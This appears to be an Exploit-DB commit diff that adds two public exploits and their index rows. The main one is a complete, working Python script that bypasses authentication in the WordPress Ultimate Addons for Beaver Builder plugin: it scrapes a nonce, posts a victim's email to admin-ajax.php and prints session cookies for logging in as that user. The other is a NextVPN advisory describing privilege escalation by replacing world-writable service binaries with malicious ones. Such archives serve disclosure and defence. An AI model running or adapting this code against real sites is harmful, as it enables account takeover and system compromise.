DB: 2020-01-01

2 changes to exploits/shellcodes

NextVPN v4.10 - Insecure File Permissions

Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
This commit is contained in:
Offensive Security 2020-01-01 05:01:57 +00:00
parent cd36764b57
commit e976278a3f
3 changed files with 146 additions and 0 deletions

76
exploits/php/webapps/47832.py Executable file
View file

@ -0,0 +1,76 @@
# Exploit Title: Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
# Date: 2019-12-21
# Exploit Authors: Raphael Karger & Nathan Hrncirik
# Vendor Homepage: https://www.ultimatebeaver.com/
# Version: Ultimate Addons for Beaver Builder < 1.2.4.1
'''
Requirements:
* Valid Admin/User Email Needs to be Known
* Social Media Login Form has to be Embedded in the Specified URL
'''
#!/usr/bin/python3
import requests
import urllib.parse
import json
import argparse
banner = r''' ____ ___ _____ _______________________________ .__ .__ __
| | \/ _ \\______ \______ \_ _____/__ _________ | | ____ |__|/ |_
| | / /_\ \| | _/| | _/| __)_\ \/ /\____ \| | / _ \| \ __\
| | / | \ | \| | \| \> < | |_> > |_( <_> ) || |
|______/\____|__ /______ /|______ /_______ /__/\_ \| __/|____/\____/|__||__|
\/ \/ \/ \/ \/|__|
Ultimate Addons for Beaver Builder < 1.2.4.1 - Authentication Bypass
'''
class exploit(object):
def __init__(self, page, email):
self.page = page
self.sess = requests.Session()
self.email = email
self.nonce = False
def get_nonce(self):
try:
nonce_req = self.sess.get(self.page)
if nonce_req.text.find("data-nonce=") != -1:
self.nonce = nonce_req.text.split("data-nonce=")[1].split(">")[0]
except Exception as e:
print("Nonce Error: {}".format(e))
def auth_bypass(self):
try:
schema = urllib.parse.urlparse(self.page)
resp = self.sess.post("{}://{}/wp-admin/admin-ajax.php".format(schema.scheme, schema.netloc), data={
"action" : "uabb-lf-google-submit",
"name" : "raphaelrocks",
"email" : self.email,
"nonce" : self.nonce
})
if resp.status_code == 200:
print("Exploit Successful, Use the Cookies to Login: \n{}".format(
json.dumps(self.sess.cookies.get_dict(), indent=4)
))
except Exception as e:
print("Auth Bypass Error: {}".format(e))
def begin_exploit(self):
self.get_nonce()
if self.nonce:
print("Found Nonce: {}".format(self.nonce))
self.auth_bypass()
else:
print("Failed to Gather Nonce")
if __name__ == "__main__":
print(banner)
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--email", dest="email", help="Email of Administrator User/Privileged User", required=True)
parser.add_argument("-u", "--url", dest="url", help="URL With Social Media Login Form", required=True)
args = parser.parse_args()
ex = exploit(args.url, args.email)
ex.begin_exploit()

View file

@ -0,0 +1,68 @@
# Exploit Title: NextVPN v4.10 - Insecure File Permissions
# Date: 2019-12-23
# Exploit Author: SajjadBnd
# Contact: blackwolf@post.com
# Vendor Homepage: https://vm3max.site
# Software Link:http://dl.spacevm.com/NextVPNSetup-v4.10.exe
# Version: 4.10
# Tested on: Win10 Professional x64
[ Description ]
The NextVPN Application was installed with insecure file permissions. It was found that all folder and file permissions were incorrectly configured during installation. It was possible to replace the service binary.
[ PoC ]
C:\Users\user\AppData\Local\NextVPN>icacls *.exe
Helper64.exe NT AUTHORITY\SYSTEM:(F)
             BUILTIN\Administrators:(F)
             DESKTOP-5V14SL6\user:(F)
 
NextVPN.exe NT AUTHORITY\SYSTEM:(F)
            BUILTIN\Administrators:(F)
            DESKTOP-5V14SL6\user:(F)
 
Proxifier.exe NT AUTHORITY\SYSTEM:(F)
              BUILTIN\Administrators:(F)
              DESKTOP-5V14SL6\user:(F)
 
ProxyChecker.exe NT AUTHORITY\SYSTEM:(F)
                 BUILTIN\Administrators:(F)
                 DESKTOP-5V14SL6\user:(F)
 
Uninstall.exe NT AUTHORITY\SYSTEM:(F)
              BUILTIN\Administrators:(F)
              DESKTOP-5V14SL6\user:(F)
 
Successfully processed 5 files; Failed processing 0 files
and other Directories :
>cd openconnect
openconnect.exe NT AUTHORITY\SYSTEM:(F)
                BUILTIN\Administrators:(F)
                DESKTOP-5V14SL6\user:(F)
Successfully processed 1 files; Failed processing 0 files
 
 
>cd st
 
st.exe NT AUTHORITY\SYSTEM:(F)
       BUILTIN\Administrators:(F)
       DESKTOP-5V14SL6\user:(F)
Successfully processed 1 files; Failed processing 0 files
 
>cd update
update.exe NT AUTHORITY\SYSTEM:(F)
           BUILTIN\Administrators:(F)
           DESKTOP-5V14SL6\user:(F)
Successfully processed 1 files; Failed processing 0 files
[ Exploit -Privilege Escalation ]
ReplaceNextVPN.exe,update.exe,st.exe,openconnect.exe,Helper64.exe and other ... with any executable
malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)
 

View file

@ -10854,6 +10854,7 @@ id,file,description,date,author,type,platform,port
47805,exploits/windows/local/47805.rb,"Microsoft UPnP - Local Privilege Elevation (Metasploit)",2019-12-30,Metasploit,local,windows,
47810,exploits/windows/local/47810.py,"AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)",2019-12-30,boku,local,windows,
47812,exploits/windows/local/47812.py,"FTP Navigator 8.03 - Stack Overflow (SEH)",2019-12-30,boku,local,windows,
47831,exploits/windows/local/47831.txt,"NextVPN v4.10 - Insecure File Permissions",2019-12-31,SajjadBnd,local,windows,
47818,exploits/windows/local/47818.txt,"Wing FTP Server 6.0.7 - Unquoted Service Path",2019-12-30,"Nawaf Alkeraithe",local,windows,
47825,exploits/windows/local/47825.py,"Domain Quester Pro 6.02 - Stack Overflow (SEH)",2019-12-30,boku,local,windows,
47829,exploits/freebsd/local/47829.sh,"FreeBSD-SA-19:02.fd - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
@ -42136,3 +42137,4 @@ id,file,description,date,author,type,platform,port
47826,exploits/hardware/webapps/47826.txt,"RICOH SP 4510SF Printer - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
47827,exploits/hardware/webapps/47827.txt,"RICOH Web Image Monitor 1.09 - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
47828,exploits/hardware/webapps/47828.txt,"Heatmiser Netmonitor 3.03 - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
47832,exploits/php/webapps/47832.py,"Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass",2019-12-31,"Raphael Karger",webapps,php,

Can't render this file because it is too large.